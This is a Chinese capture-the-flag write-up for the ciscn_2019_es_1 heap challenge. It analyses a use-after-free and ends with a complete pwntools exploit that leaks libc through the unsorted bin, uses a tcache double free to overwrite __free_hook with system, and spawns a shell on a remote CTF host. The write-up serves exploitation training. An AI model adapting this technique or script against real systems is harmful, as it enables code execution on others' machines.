ciscn_2019_es_1
使用checksec
查看:
好家伙全开,看来是堆题,先执行下看看:
堆题无误,扔进IDA中分析:
主要流程就是标红的这么几个函数,一个一个进行分析。
首先看menu()
:
- 无用,略过
add()
:
heap_addr[v0] = (void **)malloc(0x18uLL);
:程序先是会自动创建一个大小为0x18
的chunk*((_DWORD *)heap_addr[heap_number] + 2) = size;
存放name chunk的size*v1 = malloc((unsigned int)size);
:存放name chunk的指针
show()
:
*heap_addr[v1]
存的是name*heap_addr[v1] + 12
存的是phone
call()
:
- 对应的是
delete()
- free时没有free chunk只是free name chunk
- free时未清空指针
题目思路
- 未清空指针,首先考虑UAF、double free
- 利用unsorted bin获取libc基址
- 利用double free将chunk里指向name chunk指针修改成指向free_hook
- 修改free_hook为system@got
- 执行free即是执行system
步骤解析
常规的利用利用unsorted bin获取libc地址
这个题目用的是libc2.27,所以存在tcache机制,需要绕过tcache机制将chunk放入unsorted bin
因为tcache最大大小是
0x400
,所以只需申请大于0x400的chunk就可以绕过。根据 unsorted bin 的特性, fd 和 bk 指针都会指向 main_arena + 96处
此时存在UAF漏洞,chunk0的指针还在,show(0)可以将
main_arena + 96
地址给泄露出来再计算出
__malloc_hook
从而计算出基地址、__free_hook
地址和system@got
地址
malloc_hook_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-96-0x10
base_addr = malloc_hook_addr - libc.symbols['__malloc_hook']
free_hook = base_addr + libc.symbols['__free_hook']
system_addr = base_addr + libc.symbols['system']
通过利用double free修改chunk1的fd指针,让我们的下一个chunk申请到free_hook地址上去,接着再申请到的地址就是free_hook的地址,修改该chunk就相当于修改free_hook
将
free_hook
修改为system@got
当某个name chunk内容为
/bin/sh\x00
时,执行free(name chunk)
即是执行system('/bin/sh')
完整exp
from pwn import *
#start
r = remote("node4.buuoj.cn",28244)
# r = process("../buu/ciscn_2019_es_1")
libc = ELF("../buu/ubuntu18(64).so")
def add(size,name,compary):
r.sendlineafter('choice:','1')
r.sendlineafter("compary's name",str(int(size)))
r.sendafter('input name:',name)
r.sendafter('call:',compary)
def show(idx):
r.sendlineafter('choice:','2')
r.sendlineafter('index:\n',str(idx))
def delete(idx):
r.sendlineafter('choice','3')
r.sendlineafter('index:\n',str(idx))
add(0x410,'MMMM','0')
add(0x20,'MMMM','1')
add(0x20,'/bin/sh','2')
# gdb.attach(r)
delete(0)
# gdb.attach(r)
show(0)
malloc_hook_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-96-0x10
base_addr = malloc_hook_addr - libc.symbols['__malloc_hook']
free_hook = base_addr + libc.symbols['__free_hook']
system_addr = base_addr + libc.symbols['system']
delete(1)
delete(1)
# gdb.attach(r)
add(0x20,p64(free_hook),'1')
# gdb.attach(r)
add(0x20,'MMMM','1')
add(0x20,p64(system_addr),'3')
# gdb.attach(r)
delete(2)
r.interactive()